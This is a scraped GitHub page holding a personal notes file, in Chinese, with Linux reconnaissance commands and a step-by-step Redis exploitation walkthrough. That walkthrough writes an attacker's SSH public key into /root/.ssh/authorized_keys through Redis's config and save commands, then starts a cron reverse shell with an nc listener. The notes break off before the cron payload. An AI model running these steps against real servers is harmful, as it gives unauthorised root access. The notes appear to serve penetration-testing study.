Skip to content

Latest commit

 

History

History
95 lines (64 loc) · 2.44 KB

笔记.md

File metadata and controls

95 lines (64 loc) · 2.44 KB

…or create a new repository on the command line

echo "# Note-" >> README.md
git init
git add README.md
git commit -m "first commit"
git branch -M main
git remote add origin https://github.com/WANGDADAYA/Note-.git
git push -u origin main

…or push an existing repository from the command line

git remote add origin https://github.com/WANGDADAYA/Note-.git
git branch -M main
git push -u origin main

…or import code from another repository

You can initialize this repository with code from a Subversion, Mercurial, or TFS project.

笔记:

1、文件读取:

└─$ head -n 1 /etc/issue
Kali GNU/Linux Rolling \n \l

└─$ tail -n 1 /etc/passwd

   uname -a
   cat /proc/version
   head -n 1 /etc/issue   # 查看linux操作系统版本
   linux查看系统版本命令
       http://blog.csdn.net/zhuying_linux/article/details/6859286
   getconf LONG_BIT       # 查看系统是32位还是64位
   网络
   
   # ifconfig               # 查看所有网络接口的属性
   # iptables -L            # 查看防火墙设置
   # route -n               # 查看路由表
   # netstat -lntp          # 查看所有  监听端口
   # netstat -antp          # 查看所有已经建立的连接
   # netstat -s             # 查看网络统计信息
   
	find . -name "*vimrc*" | xargs grep -r "linebreak"
       #在当前目录下查找文件名中包含vimrc的所有文件,并在这些文件中查找包含"linebreak"关键字的文件中的与"linebreak"相关的行
https://www.lixiaoming.net/archives/12
在攻击机中生成ssh私钥和公钥,密码为空:ssh-keygen -t rsa

img
进入.ssh目录:cd .ssh/,将生成的公钥保存到1.txt:

(echo -e “\n\n”;cat id_rsa.pub;echo -e “\n\n”) > 1.txt

img
连接靶机的Redis,将刚生成的公钥1.txt写入redis

cat 1.txt | redis-cli 192.168.209.136 -x set crack

img
攻击机连接靶机redis:redis-cli -h 192.168.18.132

使用 config get dir 命令得到redis备份的路径,更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)并设置上传公钥的备份文件名字为authorized_keys:

config get dir

config set dir /root/.ssh

config set dbfilename “authorized_keys”

save

img
利用ssh免密登录到靶机:ssh -i id_rsa [email protected]

计划任务反弹shell

在权限足够的情况下,利用redis写入文件到计划任务目录下执行。
攻击机执行监听:nc -lnvp 4444

然后执行

img